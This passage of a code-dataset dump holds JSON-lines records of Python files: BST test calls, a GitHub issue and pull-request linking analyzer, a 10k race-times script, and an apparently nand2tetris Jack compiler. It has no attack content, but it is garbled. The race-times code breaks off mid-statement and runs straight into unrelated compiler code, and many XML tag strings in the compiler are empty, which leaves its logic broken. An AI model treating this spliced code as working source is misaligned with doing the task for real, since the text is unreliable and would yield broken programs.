print(test.contains(1))\n print(test.contains(-1))\n test.preorder(test.root)\n print()\n test.postorder(test.root)\n print()\n test.inorder(test.root)\n print()\n print(test.DFS(1))\n print(test.DFS(-1))\n print(test.DFS(7))\n print(test.BFS(1))\n print(test.BFS(-1))\n print(test.BFS(7))\n","repo_name":"lundbird/LeetCode","sub_path":"data_structures/BST.py","file_name":"BST.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"27898363171","text":"import csv\nimport re\nfrom time import *\nfrom os import path\nfrom datetime import date\n\ndef write_execution_time_log(github_repo, method_name, execution_time):\n workspace = github_repo.split(\"/\")[1] + '/statistics/'\n if path.exists(workspace + 'execution_time_log.csv'):\n timeLogCsvFile = open(workspace + 'execution_time_log.csv','a')\n else:\n timeLogCsvFile = open(workspace + 'execution_time_log.csv','w+')\n timeLogCsvFile.write('method_name,date,execution_time')\n timeLogCsvFile.write('\\n' + method_name +','+ date.today().strftime(\"%d/%m/%Y\") +','+ str(execution_time))\n timeLogCsvFile.close()\n\ndef del_duplicates(l):\n return list(dict.fromkeys(l))\n\ndef csv_to_json_list(csv_path):\n with open(csv_path, \"r\") as csvfile:\n lines = csvfile.read().splitlines()\n keys = lines[0].split(\",\")\n keys_length = len(keys)\n cvs_list = []\n for line in lines[1:]:\n temp_json = {}\n row = line.split(\",\", keys_length)\n if not (len(row) < keys_length):\n for index in range(keys_length):\n temp_json[keys[index]] = row[index]\n cvs_list.append(temp_json)\n return cvs_list\n \ndef generate_json_from_csv(key_attribute, csv_path):\n \"\"\"\n This function returns a JSON structure like\n {\n {key_1: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n {key_2: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n ... ,\n {key_n: { atr1: [data_1, data_2, ... , data_n], atr_2: [data_1, data_2, ... , data_n], ... , atr_n: [data_1, data_2, ... , data_n]}},\n }\n \"\"\"\n json = {}\n with open(csv_path, \"r\") as csvfile:\n lines = csvfile.read().splitlines()\n keys = lines[0].split(\",\")\n keys_length = len(keys)\n key_id_index = keys.index(key_attribute)\n keys.remove(key_attribute)\n for line in lines[1:]:\n row = line.split(\",\", keys_length)\n if not (len(row) < keys_length):\n key = row[key_id_index]\n row.remove(key)\n if not key in json:\n json[key] = {}\n for column in range(0, keys_length - 1):\n json[key][keys[column]] = [row[column]]\n else:\n for column in range(0, keys_length - 1):\n json[key][keys[column]].append(row[column])\n return json\n\ndef analyze_issues_and_pulls(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n log_file = open(\"log.file\",\"w\")\n \"\"\"\n # Generating organized JSON data from issues related csv files\n \"\"\"\n issues_json = generate_json_from_csv(\"issue_no\", workspace + \"issues.csv\")\n issues_json.update(generate_json_from_csv(\"issue_no\", workspace + \"issues_comments.csv\"))\n \"\"\"\n # Generating organized JSON data from pull requests related csv files\n \"\"\"\n pulls_json = generate_json_from_csv(\"pull_no\", workspace + \"pulls.csv\")\n pulls_json.update(generate_json_from_csv(\"pull_no\", workspace + \"pulls_comments.csv\"))\n \"\"\"\n # Analysing issue data JSON\n \"\"\"\n rows = [['issue_no','found_id','is_issue','is_pull_request']]\n statistics = {\"issue numbers\":0,\"pull request numbers\":0,\"both\":0,\"unknown\":0}\n issue_progress_counter = 0\n\n for (issue_no, attributes) in issues_json.items():\n for attr in [\"title\",\"body\",\"comment_body\"]:\n if attr in attributes:\n for attribute in attributes[attr]:\n links = re.findall(r\"([C|c]lose[s|d]?|[R|r]esolve[s|d]?|[F|f]ix|[F|f]ixe[s|d])?\\s+([\\w|\\-|/]*)?#(\\d+)\", attribute)\n log_file.seek(0)\n log_file.write(\"Current Method: 
analyze_issues_and_pulls\\n Task progress: \" + str((issue_progress_counter * 100)/len(issues_json)) + \"\\n\")\n log_file.truncate()\n #print(\" Analyzing issues data. Progress \", (issue_progress_counter * 100)/len(issues_json), \" \", end=\"\\r\")\n for link in links:\n is_issue = link[2] in issues_json\n is_pull_request = link[2] in pulls_json\n if is_issue: statistics[\"issue numbers\"] += 1 \n if is_pull_request: statistics[\"pull request numbers\"] += 1 \n if is_issue and is_pull_request: statistics[\"both\"] += 1 \n if not is_issue and not is_pull_request: statistics[\"unknown\"] += 1 \n rows.append([issue_no, link[2], is_issue, is_pull_request])\n issue_progress_counter += 1\n \"\"\"\n # Printing statistics\n \"\"\"\n print(\"\\n\",\"-\"*30)\n print(\"Statistics for issue data analysis\")\n print(\"-\"*30)\n print(\"Total links found:\",len(rows))\n for (text, value) in statistics.items():\n print(\"Links that are\",text,\":\",value)\n print(\"-\"*30,\"\\n\\n\")\n \"\"\"\n # Creating cvs file\n \"\"\"\n outCsvFile = open(workspace + 'issues_analysis.csv', 'w')\n csv_writer = csv.writer(outCsvFile)\n csv_writer.writerows(rows)\n outCsvFile.close()\n \"\"\"\n # Analysing pull request data JSON\n \"\"\"\n rows = [['pull_no','found_id','is_issue','is_pull_request']]\n statistics = {\"issue numbers\":0,\"pull request numbers\":0,\"both\":0,\"unknown\":0}\n pull_progress_counter = 0\n\n for (pull_no, attributes) in pulls_json.items():\n for attr in [\"title\",\"body\",\"comment_body\"]:\n if attr in attributes:\n for attribute in attributes[attr]:\n links = re.findall(r\"([C|c]lose[s|d]?|[R|r]esolve[s|d]?|[F|f]ix|[F|f]ixe[s|d])?\\s+([\\w|\\-|/]*)?#(\\d+)\", attribute)\n log_file.seek(0)\n log_file.write(\"Current Method: analyze_issues_and_pulls\\n Task progress: \" + str((pull_progress_counter * 100)/len(pulls_json)) + \"\\n\")\n log_file.truncate()\n #print(\" Analyzing pull requests data. 
Progress \", (pull_progress_counter * 100)/len(pulls_json), \" \", end=\"\\r\")\n for link in links:\n is_issue = link[2] in issues_json\n is_pull_request = link[2] in pulls_json\n if is_issue: statistics[\"issue numbers\"] += 1 \n if is_pull_request: statistics[\"pull request numbers\"] += 1 \n if is_issue and is_pull_request: statistics[\"both\"] += 1 \n if not is_issue and not is_pull_request: statistics[\"unknown\"] += 1 \n rows.append([pull_no, link[2], is_issue, is_pull_request])\n pull_progress_counter += 1\n \"\"\"\n # Printing statistics\n \"\"\"\n print(\"\\n\",\"-\"*30)\n print(\"Statistics for pull request data analysis\")\n print(\"-\"*30)\n print(\"Total links found:\",len(rows))\n for (text, value) in statistics.items():\n print(\"Links that are\",text,\":\",value)\n print(\"-\"*30)\n \"\"\"\n # Creating cvs file\n \"\"\"\n outCsvFile = open(workspace + 'pull_request_analysis.csv', 'w')\n csv_writer = csv.writer(outCsvFile)\n csv_writer.writerows(rows)\n outCsvFile.close()\n log_file.close()\n\n write_execution_time_log(github_repo, \"analyze_issues_and_pulls\", time() - start_time)\n\ndef analyze_linking_events(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n issues_events_list = csv_to_json_list(workspace + 'issues_events.csv')\n pulls_events_list = csv_to_json_list(workspace + 'pulls_events.csv')\n\n filtered_issues_events_list = []\n filtered_pulls_events_list = []\n\n for issue_event in issues_events_list:\n if issue_event['event'] in ['connected','disconnected']:\n filtered_issues_events_list.append(issue_event)\n\n for pull_event in pulls_events_list:\n if pull_event['event'] in ['connected','disconnected']:\n filtered_pulls_events_list.append(pull_event) \n\n linked_issues_and_pull_events = [['issue_no', 'pull_no', 'actor', 'created_at', 'event']]\n\n for issue_event in filtered_issues_events_list:\n for pull_event in filtered_pulls_events_list:\n\n issue_relevant_data = [issue_event['actor'], issue_event['created_at'], issue_event['event']]\n pull_relevant_data = [pull_event['actor'], pull_event['created_at'], pull_event['event']]\n\n if issue_relevant_data == pull_relevant_data:\n linked_issues_and_pull_events.append([issue_event['issue_no'], pull_event['pull_no']] + issue_relevant_data) \n \n analyzedEventsCsvFile = open(workspace + 'linking_analysis.csv', 'w')\n\n issues_events_csv_writer = csv.writer(analyzedEventsCsvFile)\n issues_events_csv_writer.writerows(linked_issues_and_pull_events)\n \n analyzedEventsCsvFile.close()\n\n write_execution_time_log(github_repo, \"analyze_linking_events\", time() - start_time)\n\ndef link_commits_pulls_and_issues(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n outCsvFile = open(workspace + 'linked_commits_pulls_and_issues.csv', 'w')\n log_file = open(\"log.file\",\"w\")\n\n csv_writer = csv.writer(outCsvFile)\n\n commits_pulls = generate_json_from_csv(\"commit_sha\", workspace + \"commits_pulls.csv\")\n linked_pull_issues = generate_json_from_csv(\"pull_no\", workspace + \"pull_request_analysis.csv\")\n pulls_without_commits = generate_json_from_csv(\"total_commits\", workspace + \"pulls_commits_total.csv\")\n manual_linked_pull_issues = csv_to_json_list(workspace + \"linking_analysis.csv\")\n\n rows = [['commit_sha', 'pull_no', 'issue_no']]\n # ---------------------------------------------------------------\n # This code deletes disconnected events from linking_analysis.csv \n # 
---------------------------------------------------------------\n index = 0\n while index < len(manual_linked_pull_issues):\n current_element = manual_linked_pull_issues[index]\n if current_element['event'] == 'disconnected':\n delete_index = 0\n element = manual_linked_pull_issues[delete_index]\n while delete_index < len(manual_linked_pull_issues) and element['issue_no'] != current_element['issue_no'] and element['pull_no'] != current_element['issue_no'] and element['event'] != 'connected':\n delete_index += 1\n element = manual_linked_pull_issues[delete_index]\n del manual_linked_pull_issues[index]\n del manual_linked_pull_issues[delete_index]\n index += 1\n # ---------------------------------------------------------------\n c = 0\n for (commit_sha, attributes) in commits_pulls.items():\n if len(attributes['pull_no']) == 0:\n # If there is not pulls for this commit\n rows.append([commit_sha, 'None', 'None'])\n else:\n # If there are ...\n for pull_no in attributes['pull_no']:\n # Saving all posible boolean scenarios for a pull-issue linking event\n there_are_issues = pull_no in linked_pull_issues\n there_are_manual_issues = pull_no in manual_linked_pull_issues\n there_are_not_issues = (not there_are_issues) and (not there_are_manual_issues)\n # Taking action according boolean scenario\n if there_are_issues:\n found_id = linked_pull_issues[pull_no]['found_id']\n is_issue = linked_pull_issues[pull_no]['is_issue']\n for i in range(len(is_issue)):\n if is_issue[i] == 'True':\n rows.append([commit_sha, pull_no, found_id[i]])\n if there_are_manual_issues:\n for link in manual_linked_pull_issues:\n if pull_no == link['pull_no']:\n rows.append([commit_sha, pull_no, link['issue_no']])\n if there_are_not_issues:\n rows.append([commit_sha, pull_no, 'None'])\n progress = (c * 100) / len(commits_pulls)\n log_file.seek(0)\n log_file.write(\"Current Method: link_commits_pulls_and_issues\\n Task progress: \" + str(progress) + \"\\n\")\n log_file.truncate()\n #print(\" \", progress, \"% \", end=\"\\r\")\n c += 1\n # ---------------------------------------------------------------\n # This codes link all pulls without commits with issues\n # ---------------------------------------------------------------\n if '0' in pulls_without_commits:\n for pull in pulls_without_commits['0']['pull_no']:\n # Saving all posible boolean scenarios for a pull-issue linking event\n there_are_issues = pull in linked_pull_issues\n there_are_manual_issues = pull in manual_linked_pull_issues\n there_are_not_issues = not there_are_issues and not there_are_manual_issues\n # Taking action according boolean scenario\n if there_are_issues:\n found_id = linked_pull_issues[pull]['found_id']\n is_issue = linked_pull_issues[pull]['is_issue']\n for i in range(len(is_issue)):\n if is_issue[i] == 'True':\n rows.append(['None', pull, found_id[i]])\n if there_are_manual_issues:\n for link in manual_linked_pull_issues:\n if pull == link['pull_no']:\n rows.append(['None', pull, link['issue_no']])\n if there_are_not_issues:\n rows.append(['None', pull, 'None'])\n # ---------------------------------------------------------------\n csv_writer.writerows(rows)\n\n outCsvFile.close()\n log_file.close()\n\n write_execution_time_log(github_repo, \"link_commits_pulls_and_issues\", time() - start_time)\n\ndef group_pulls_and_commits(github_repo):\n \"\"\"\n This function returns a JSON structure like\n {\n { group_1: { pulls: [data_1, data_2, ... , data_n], commits: [data_1, data_2, ... , data_n] } },\n { group_2: { pulls: [data_1, data_2, ... 
, data_n], commits: [data_1, data_2, ... , data_n] } },\n ... ,\n { group_n: { pulls: [data_1, data_2, ... , data_n], commits: [data_1, data_2, ... , data_n] } },\n }\n \"\"\"\n workspace = github_repo.split(\"/\")[1] + '/files/'\n linked_elements = csv_to_json_list(workspace + \"linked_commits_pulls_and_issues.csv\")[::-1]\n log_file = open(\"log.file\",\"w\")\n groups = {}\n group_counter = 0\n progress_counter = 0\n\n for element in linked_elements:\n found = False\n if element['pull_no'] != 'None' and element['commit_sha'] != 'None':\n for (group, attributes) in groups.items():\n if element['pull_no'] in attributes['pulls']:\n groups[group]['commits'].append(element['commit_sha'])\n found = True\n break\n if element['commit_sha'] in attributes['commits']:\n groups[group]['pulls'].append(element['pull_no'])\n found = True\n break\n if not found:\n groups[group_counter] = {}\n groups[group_counter]['commits'] = [element['commit_sha']]\n groups[group_counter]['pulls'] = [element['pull_no']]\n group_counter += 1\n progress = (progress_counter * 100) / len(linked_elements)\n log_file.seek(0)\n log_file.write(\"Current Method: get_pulls_commits_groups\\n Task progress: \" + str(progress) + \"\\n\")\n log_file.truncate()\n #print(\" \", progress, \"% \", end=\"\\r\")\n progress_counter += 1\n log_file.close()\n return groups\n\ndef get_pulls_commits_groups(github_repo):\n start_time = time()\n workspace = github_repo.split(\"/\")[1] + '/files/'\n groupsTotalCsvFile = open(workspace + 'pulls_commits_groups_total.csv', 'w')\n groupsCsvFile = open(workspace + 'pulls_commits_groups.csv', 'w')\n groups_total_csv_writer = csv.writer(groupsTotalCsvFile)\n groups_csv_writer = csv.writer(groupsCsvFile)\n\n groups_total_rows = [['group','oldest_pull','pulls_total','commits_total']]\n groups_rows = [['group','elements']]\n\n groups = group_pulls_and_commits(github_repo)\n\n for (group, attributes) in groups.items():\n # Turn into integers all elements in attributes['pulls']\n int_pulls = [int(e) for e in attributes['pulls']]\n groups_total_rows.append([group, min(int_pulls), len(attributes['pulls']), len(attributes['commits'])])\n groups_rows.append([group] + attributes['pulls'] + attributes['commits'])\n\n groups_total_csv_writer.writerows(groups_total_rows)\n groups_csv_writer.writerows(groups_rows)\n\n groupsTotalCsvFile.close()\n groupsCsvFile.close()\n\n write_execution_time_log(github_repo, \"get_pulls_commits_groups\", time() - start_time)","repo_name":"jnavas-tec/GitHubAnalyzer","sub_path":"data_handler.py","file_name":"data_handler.py","file_ext":"py","file_size_in_byte":17049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
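One correctness issue in link_commits_pulls_and_issues above: manual_linked_pull_issues is a list of dicts, so the test `pull_no in manual_linked_pull_issues` compares a string against dicts and is always False, which means the manual-link branches never fire. A hedged fix is to build a set of pull numbers once and test membership against that:

# Build the lookup once; the membership tests then mean what the code intends.
manual_pull_nos = {link['pull_no'] for link in manual_linked_pull_issues}

there_are_issues = pull_no in linked_pull_issues
there_are_manual_issues = pull_no in manual_pull_nos
there_are_not_issues = (not there_are_issues) and (not there_are_manual_issues)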
+{"seq_id":"15148796056","text":"# Source of data: https://www.arrs.run/\r\n# This dataset has race times for women 10k runners from the Association of Road Racing Statisticians\r\n# Assume a year has 365.25 days\r\nfrom time import strptime\r\nfrom calendar import monthrange\r\n\r\ndef get_data():\r\n with open('10k_racetimes.txt', 'rt') as file:\r\n content = file.readlines()\r\n return content\r\n\r\n\r\n \r\n \r\ndef get_event_time(lines):\r\n \"\"\"Given a line with Jennifer Rhines' race times from 10k_racetimes.txt, \r\n parse it and return a tuple of (age at event, race time).\r\n Assume a year has 365.25 days\"\"\"\r\n \r\n jens_races = {}\r\n birthdate=\"\"\r\n max=0\r\n max_time=0\r\n for line in lines:\r\n if line[14:29]== \"Jennifer Rhines\":\r\n if int(line[3:5]+line[6:8])>max:\r\n max=int(line[3:5]+line[6:8]) \r\n jens_races[line[0:12].replace(\" \",\"\").replace(\" \",\"\")]=line[56:68].replace(\" \",\"\")\r\n birthdate=line[74:85]\r\n \r\n for time in jens_races.keys():\r\n if int(time[0:2])+ int(time[3:5])/100>max_time:\r\n max_time=int(time[0:2])+ int(time[3:5])/100\r\n max_time_date= jens_races[str(max_time).replace(\".\",\":\")] \r\n return max_time_date, birthdate,str(max_time) \r\ndef get_age_slowest_times():\r\n '''Return a tuple (age, race_time) where:\r\n age: AyBd is in this format where A and B are integers'''\r\n \r\n lines= get_data()\r\n max_date, birthdate,max_time= get_event_time(lines)\r\n max_day=int(max_date[0:2])\r\n birth_day=int(birthdate[0:2])\r\n birth_month=strptime(birthdate[2:5],'%b').tm_mon\r\n max_month= int(strptime(max_date[2:5],'%b').tm_mon)\r\n max_year=int(max_date[-4:])\r\n birth_year=int(birthdate[-5:])\r\n age_year=max_year-birth_year \r\n \r\n for i in range(1,max_month):\r\n max_day+=int(monthrange(max_year,i)[1])\r\n for i in range(1,birth_month):\r\n birth_day+=int(monthrange(birth_year,i)[1]) \r\n \r\n if max_day>birth_day:\r\n age_day=max_day-birth_day\r\n elif max_day HOW MANY ~! => HOWMANY~ \n # NG: HOW MANY ~! => HOW MANY ~! 
\n if line.startswith(\"\"):\n xml_input += line.strip() \\\n .replace(\" \", \"\") \\\n .replace(\" \", \" \")\n else:\n xml_input += line.strip().replace(\" \", \"\")\n\n # tree = ET.parse(xml_input)\n # self._root = tree.getroot()\n self._root = ET.fromstring(xml_input)\n if self._root.tag != \"tokens\":\n raise RuntimeError(\"The root tag should be '~ '.\")\n self._line_num = 0\n\n self._symbol_table = SymbolTable()\n self._vm_writer = VMWriter(out_vm_path)\n\n self._class_name = None\n self._subroutine_params_num = 0\n self._expression_num = 0\n self._var_dec_num = 0\n self._class_dec_field_num = 0\n self._class_dec_static_num = 0\n self._subroutine_name = \"\"\n self._if_count = 0\n self._while_count = 0\n return\n\n def close(self):\n self._out_file.close()\n self._vm_writer.close()\n return\n\n def compile_class(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"class\")\n self._class_name = self._text()\n\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"{\")\n\n while self._text() in [\"constructor\", \"function\", \"method\", \"static\", \"field\"]:\n if self._text() in [\"constructor\", \"function\", \"method\"]:\n self._subroutine_type = self._text()\n self.compile_subroutine()\n elif self._text() in [\"static\", \"field\"]:\n self.compile_class_var_dec()\n self._output(\"symbol\", \"}\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_class_var_dec(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n category_kind = Kind.STATIC if self._text() == \"static\" else Kind.FIELD\n\n self._output(\"keyword\", None)\n\n type = self._text()\n if self._text() in [\"int\", \"char\", \"boolean\"]:\n self._output(\"keyword\", None)\n else:\n self._output(\"identifier\", None)\n\n self._symbol_table.define(self._text(), type, category_kind)\n self._output(\"identifier\", None)\n self._countup_class_dec_num(category_kind)\n\n while self._text() == \",\":\n self._output(\"symbol\", \",\")\n self._symbol_table.define(self._text(), type, category_kind)\n self._output(\"identifier\", None)\n self._countup_class_dec_num(category_kind)\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _countup_class_dec_num(self, category_kind):\n if category_kind is Kind.STATIC:\n self._class_dec_static_num += 1\n else:\n self._class_dec_field_num += 1\n\n def compile_subroutine(self):\n\n self._symbol_table.start_subroutine()\n\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", None)\n if self._text() in [\"void\", \"int\", \"char\", \"boolean\"]:\n self._output(\"keyword\", None)\n else:\n self._output(\"identifier\", None)\n # subroutine name\n self._subroutine_name = self._text()\n if self._subroutine_type == \"method\":\n self._symbol_table.define(\"this\", self._class_name, Kind.ARG)\n\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"(\")\n\n self._subroutine_params_num = 0\n self.compile_parameter_list()\n\n self._if_count = 0\n self._while_count = 0\n self._output(\"symbol\", \")\")\n self.compile_subroutine_body()\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n return\n\n def compile_subroutine_body(self):\n self._dump_xml(\"\")\n self._indent += 1\n self._output(\"symbol\", \"{\")\n\n self._var_dec_num = 0\n while self._text() == \"var\":\n self.compile_var_dec()\n\n self._vm_writer.write_function(\"{}.{}\".format(self._class_name, self._subroutine_name), self._var_dec_num)\n if self._subroutine_type == \"constructor\":\n 
self._vm_writer.write_push(\"constant\", self._class_dec_field_num)\n self._vm_writer.write_call(\"Memory.alloc\", 1)\n self._vm_writer.write_pop(\"pointer\", 0)\n elif self._subroutine_type == \"method\":\n self._vm_writer.write_push(\"argument\", 0)\n self._vm_writer.write_pop(\"pointer\", 0)\n\n self.compile_statements()\n\n self._output(\"symbol\", \"}\")\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n VAR_TYPE_KEYWORDS = [\"int\", \"char\", \"boolean\"]\n\n def compile_parameter_list(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n type = self._text()\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n\n while self._text() == \",\":\n type = self._text()\n self._output(\"symbol\", \",\")\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._symbol_table.define(self._text(), type, Kind.ARG)\n self._output(\"identifier\", None)\n self._subroutine_params_num += 1\n else:\n break\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_var_dec(self):\n self._dump_xml(\"\")\n self._indent += 1\n self._output(\"keyword\", \"var\")\n\n type = self._text()\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n\n while True:\n self._symbol_table.define(self._text(), type, Kind.VAR)\n self._output(\"identifier\", None)\n self._var_dec_num += 1\n if self._text() == \",\":\n self._output(\"symbol\", \",\")\n else:\n break\n\n self._output(\"symbol\", \";\")\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _var_type(self):\n if self._text() in self.VAR_TYPE_KEYWORDS:\n self._output(\"keyword\", None)\n self._output(\"identifier\", None)\n elif self._tag() == \"identifier\":\n self._output(\"identifier\", None)\n self._output(\"identifier\", None)\n return\n\n def compile_statements(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n while self._text() in [\"let\", \"if\", \"while\", \"do\", \"return\"]:\n if self._text() == \"if\":\n self.compile_if()\n elif self._text() == \"let\":\n self.compile_let()\n elif self._text() == \"while\":\n self.compile_while()\n elif self._text() == \"do\":\n self.compile_do()\n else:\n self.compile_return()\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_do(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"do\")\n self._compile_subroutine_call()\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n self._vm_writer.write_pop(\"temp\", 0)\n return\n\n def compile_while(self):\n self._dump_xml(\"\")\n self._indent += 1\n label_exp = \"WHILE_EXP\" + str(self._while_count)\n label_end = \"WHILE_END\" + str(self._while_count)\n self._while_count += 1\n\n self._output(\"keyword\", \"while\")\n self._vm_writer.write_label(label_exp)\n\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n self._output(\"symbol\", 
\"{\")\n\n self._vm_writer.write_arithmetic(\"not\")\n self._vm_writer.write_if(label_end)\n\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n self._vm_writer.write_goto(label_exp)\n self._vm_writer.write_label(label_end)\n return\n\n def compile_let(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"let\")\n let_identifier = self._text()\n # if left-side var is array\n array_flag = False\n self._output(\"identifier\", None)\n\n if self._text() == \"[\":\n self._output(\"symbol\", \"[\")\n self.compile_expression()\n self._output(\"symbol\", \"]\")\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(let_identifier)),\n self._symbol_table.index_of(let_identifier))\n self._vm_writer.write_arithmetic(\"add\")\n array_flag = True\n\n self._output(\"symbol\", \"=\")\n self.compile_expression()\n self._output(\"symbol\", \";\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n if not array_flag:\n self._vm_writer.write_pop(KIND_VM_MAP.get(\n self._symbol_table.kind_of(let_identifier)),\n self._symbol_table.index_of(let_identifier))\n else:\n self._vm_writer.write_pop(\"temp\", 0)\n self._vm_writer.write_pop(\"pointer\", 1)\n self._vm_writer.write_push(\"temp\", 0)\n self._vm_writer.write_pop(\"that\", 0)\n return\n\n def compile_return(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n self._output(\"keyword\", \"return\")\n if self._text() != \";\":\n self.compile_expression()\n else:\n self._vm_writer.write_push(\"constant\", 0)\n self._output(\"symbol\", \";\")\n self._vm_writer.write_return()\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_if(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n true_label = \"IF_TRUE\" + str(self._if_count)\n false_label = \"IF_FALSE\" + str(self._if_count)\n end_label = \"IF_END\" + str(self._if_count)\n # this count should be counted-up after making these labels immediately\n self._if_count += 1\n\n self._output(\"keyword\", \"if\")\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n\n self._vm_writer.write_if(true_label)\n self._vm_writer.write_goto(false_label)\n self._vm_writer.write_label(true_label)\n\n self._output(\"symbol\", \"{\")\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n if self._text() == \"else\":\n self._vm_writer.write_goto(end_label)\n self._vm_writer.write_label(false_label)\n\n self._output(\"keyword\", \"else\")\n self._output(\"symbol\", \"{\")\n self.compile_statements()\n self._output(\"symbol\", \"}\")\n\n self._vm_writer.write_label(end_label)\n else:\n self._vm_writer.write_label(false_label)\n\n self._indent -= 1\n self._dump_xml(\" \")\n\n return\n\n def compile_expression(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n command = None\n\n self.compile_term()\n while self._text() in [\"+\", \"-\", \"*\", \"/\", \"=\", \"&\", \"|\", \"<\", \">\"]:\n\n if self._text() == \"+\":\n command = \"add\"\n elif self._text() == \"-\":\n command = \"sub\"\n elif self._text() == \"*\":\n command = \"call Math.multiply 2\"\n elif self._text() == \"/\":\n command = \"call Math.divide 2\"\n elif self._text() == \">\":\n command = \"gt\"\n elif self._text() == \"<\":\n command = \"lt\"\n elif self._text() == \"&\":\n command = \"and\"\n elif self._text() == \"=\":\n command = \"eq\"\n elif self._text() == \"|\":\n command = \"or\"\n\n self._output(\"symbol\", None)\n self.compile_term()\n\n if command is not None: 
self._vm_writer.write_arithmetic(command)\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def compile_term(self):\n self._dump_xml(\"\")\n self._indent += 1\n\n if self._tag() == \"integerConstant\":\n self._vm_writer.write_push(\"constant\", int(self._text()))\n self._output(\"integerConstant\", None)\n\n elif self._tag() == \"stringConstant\":\n self._compile_string_constant()\n\n elif self._tag() == \"keyword\" and self._text() in [\"true\", \"false\", \"this\", \"null\"]:\n if self._text() == \"true\":\n self._vm_writer.write_push(\"constant\", 0)\n self._vm_writer.write_arithmetic(\"not\")\n elif self._text() == \"false\":\n self._vm_writer.write_push(\"constant\", 0)\n elif self._text() == \"this\":\n self._vm_writer.write_push(\"pointer\", 0)\n elif self._text() == \"null\":\n self._vm_writer.write_push(\"constant\", 0)\n self._output(\"keyword\", None)\n\n elif self._tag() == \"identifier\":\n # fetch a advanced element.\n next_element = self._root[self._line_num + 1]\n\n if next_element.text == \"[\":\n identifier = self._text()\n self._output(\"identifier\", None)\n self._output(\"symbol\", \"[\")\n self.compile_expression()\n self._output(\"symbol\", \"]\")\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(identifier)),\n self._symbol_table.index_of(identifier))\n self._vm_writer.write_arithmetic(\"add\")\n self._vm_writer.write_pop(\"pointer\", 1)\n self._vm_writer.write_push(\"that\", 0)\n\n elif next_element.text in [\"(\", \".\"]:\n self._compile_subroutine_call()\n\n else:\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(self._text())),\n self._symbol_table.index_of(self._text()))\n self._output(\"identifier\", None)\n\n\n elif self._tag() == \"symbol\" and self._text() == \"(\":\n self._output(\"symbol\", \"(\")\n self.compile_expression()\n self._output(\"symbol\", \")\")\n\n elif self._tag() == \"symbol\" and self._text() in [\"-\", \"~\"]:\n unary_operator = self._text()\n self._output(\"symbol\", None)\n self.compile_term()\n if unary_operator == \"-\":\n self._vm_writer.write_arithmetic(\"neg\")\n else:\n self._vm_writer.write_arithmetic(\"not\")\n\n self._indent -= 1\n self._dump_xml(\" \")\n return\n\n def _compile_string_constant(self):\n string = self._text()\n self._vm_writer.write_push(\"constant\", len(string))\n self._vm_writer.write_call(\"String.new\", 1)\n for elem in string:\n # jack string is mapped to ASCII code table\n self._vm_writer.write_push(\"constant\", ord(elem))\n self._vm_writer.write_call(\"String.appendChar\", 2)\n self._output(\"stringConstant\", None)\n return\n\n def _compile_subroutine_call(self):\n\n self._expression_num = 0\n\n method = self._text()\n\n # The case of new method\n if (self._symbol_table.kind_of(method) != Kind.NONE):\n instance_name = method\n method = self._symbol_table.type_of(method)\n self._expression_num += 1\n self._vm_writer.write_push(KIND_VM_MAP.get(self._symbol_table.kind_of(instance_name)),\n 